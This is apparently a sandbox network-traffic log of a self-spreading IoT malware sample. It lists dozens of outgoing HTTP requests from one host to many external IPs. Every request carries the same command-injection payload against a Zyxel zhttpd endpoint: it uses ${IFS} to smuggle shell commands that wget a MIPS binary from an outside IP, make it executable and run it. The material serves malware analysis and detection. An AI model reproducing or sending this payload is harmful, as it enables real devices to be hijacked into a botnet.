                                          Jan 14, 2024 15:46:29.291461945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7494192.168.2.234631290.73.37.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291501045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7495192.168.2.2356340153.27.152.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291515112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7496192.168.2.2341190170.186.41.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291527033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7497192.168.2.235294496.211.75.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291542053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7498192.168.2.234251268.117.92.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291594028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7499192.168.2.2356700196.75.24.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291623116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7500192.168.2.2357504115.49.18.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291656017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7501192.168.2.23393284.167.238.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291662931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7502192.168.2.2355898158.121.160.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291704893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7503192.168.2.2348996128.179.29.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291728020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7504192.168.2.2347550108.127.228.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291764975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7505192.168.2.235240438.185.241.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291779041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7506192.168.2.2340904122.33.20.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291829109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7507192.168.2.2359940124.115.49.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291863918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7508192.168.2.2348324130.128.196.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291872025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7509192.168.2.235321488.163.112.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291887045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7510192.168.2.234998652.242.59.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291908026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7511192.168.2.2339392201.98.209.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291938066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7512192.168.2.235106278.135.181.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291944981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7513192.168.2.2336282153.76.236.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.291996002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7514192.168.2.235408024.119.175.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292006016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7515192.168.2.2334750121.103.218.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292027950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7516192.168.2.2333404108.50.187.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292036057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7517192.168.2.233970639.160.98.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292076111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7518192.168.2.233825058.124.121.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292093039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7519192.168.2.2341544125.74.37.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292154074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7520192.168.2.235532265.192.105.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292161942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7521192.168.2.234263213.145.246.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292185068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7522192.168.2.2354376176.166.124.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292210102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7523192.168.2.2344082183.197.28.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292243004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7524192.168.2.2342260115.151.98.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292257071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7525192.168.2.2354238159.76.144.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292284012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7526192.168.2.2340066188.19.47.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292300940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7527192.168.2.2339054192.250.252.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292339087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7528192.168.2.233292846.147.189.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292346001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7529192.168.2.233986669.87.123.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292381048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7530192.168.2.2349006117.80.72.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292412043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7531192.168.2.2359284176.102.57.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292448044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7532192.168.2.2358514145.237.156.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292452097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7533192.168.2.234219474.26.239.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292483091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7534192.168.2.236053060.216.186.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292505026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7535192.168.2.235131679.231.103.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292515039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7536192.168.2.234941814.56.148.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292550087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7537192.168.2.234753212.152.215.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292618990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7538192.168.2.2335892152.159.29.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292644024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7539192.168.2.2350598216.194.101.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292645931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7540192.168.2.233701235.143.173.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292682886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7541192.168.2.2341020219.187.27.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292736053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7542192.168.2.2344354209.151.48.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292753935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7543192.168.2.234253264.152.149.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292793036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7544192.168.2.2335814133.170.241.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292809963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7545192.168.2.2339482132.96.96.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292824984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7546192.168.2.2345506184.186.42.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292845011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7547192.168.2.2336562180.245.250.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292876005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7548192.168.2.2347094175.241.5.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292910099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7549192.168.2.2354508109.69.200.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292932034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7550192.168.2.235875293.38.59.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292962074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7551192.168.2.2338158201.100.39.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292974949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7552192.168.2.2354444135.215.49.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.292984009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7553192.168.2.2345000155.43.130.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293055058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7554192.168.2.2349066116.163.125.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293057919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7555192.168.2.235062477.25.56.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:29.293073893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7556192.168.2.235340066.225.108.33443
                                          TimestampBytes transferredDirectionData
